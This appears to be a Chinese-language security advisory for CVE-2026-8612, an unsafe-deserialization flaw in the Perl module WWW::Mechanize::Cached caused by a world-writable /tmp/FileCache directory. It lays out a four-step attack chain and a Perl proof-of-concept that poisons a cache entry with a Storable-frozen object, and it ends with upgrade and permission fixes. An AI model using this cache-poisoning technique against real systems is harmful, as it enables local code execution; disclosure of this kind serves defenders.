IPBUF安全漏洞报告
English
CVE-2026-8612 CVSS 5.3 中危

CVE-2026-8612 Perl模块反序列化漏洞

披露日期: 2026-05-15
来源: 9b29abf9-4ab0-4765-b253-1875cd9b441e

漏洞信息

漏洞编号
CVE-2026-8612
漏洞类型
反序列化漏洞
CVSS评分
5.3 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WWW::Mechanize::Cached (Perl)

相关标签

反序列化代码执行Perl本地攻击CVE-2026-8612

漏洞概述

WWW::Mechanize::Cached Perl模块2.00之前版本存在不安全的反序列化漏洞。由于默认缓存目录权限被设置为0777,本地攻击者可轻易篡改特定缓存的HTTP响应,利用Storable::thaw反序列化机制,最终导致受害者进程执行任意代码。

技术细节

该漏洞源于WWW::Mechanize::Cached在未显式配置缓存后端时,会使用Cache::FileCache在/tmp/FileCache目录下创建缓存。由于未覆盖默认的directory_umask(000),生成的缓存目录权限为0777(全局可写)。本地攻击者可利用此权限,替换SHA1哈希命名的缓存条目。当受害者再次请求该URL时,程序会调用Storable::thaw读取恶意数据。如果受害者进程加载了包含特定钩子(如STORABLE_thaw, DESTROY或重载操作)的类,攻击者即可通过构造恶意的序列化对象触发反序列化漏洞,从而实现本地权限提升及任意代码执行。

攻击链分析

STEP 1
侦察
攻击者确认本地系统正在使用存在漏洞的WWW::Mechanize::Cached (< 2.00)版本,且缓存目录位于默认的/tmp/FileCache。
STEP 2
利用
攻击者利用缓存目录0777的权限,计算目标URL的SHA1哈希值,定位对应的缓存文件。
STEP 3
投毒
攻击者构造恶意的序列化对象,并将其写入到缓存文件中,替换原本合法的HTTP响应缓存。
STEP 4
执行
当受害者应用程序调用get()请求该URL时,模块从缓存读取恶意文件并通过Storable::thaw反序列化,触发代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/perl # PoC for CVE-2026-8612: Local Cache Poisoning use strict; use warnings; use Storable qw(freeze); use Digest::SHA qw(sha1_hex); use File::Path qw(make_path); my $target_url = 'http://example.com/target'; my $cache_dir = '/tmp/FileCache'; my $cache_key = sha1_hex($target_url); # Malicious payload to be deserialized my $malicious_data = { _rc => 200, _content => '<p>Malicious content</p>', # In a real exploit, this would contain an object triggering a gadget chain }; my $frozen = freeze($malicious_data); # Emulate attacker writing to the world-writable cache make_path($cache_dir, { mode => 0777 }); open my $fh, '>', "$cache_dir/$cache_key" or die $!; binmode $fh; print $fh $frozen; close $fh; print "PoC: Cache poisoned at $cache_dir/$cache_key\n";

影响范围

WWW::Mechanize::Cached < 2.00

防御指南

临时缓解措施
建议立即将WWW::Mechanize::Cached模块升级至2.00或更高版本,该版本修复了默认缓存权限问题。如果无法立即升级,请手动修改缓存目录(/tmp/FileCache)的权限,移除其他用户的写入权限,或者配置应用程序使用非公共可写的缓存路径。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表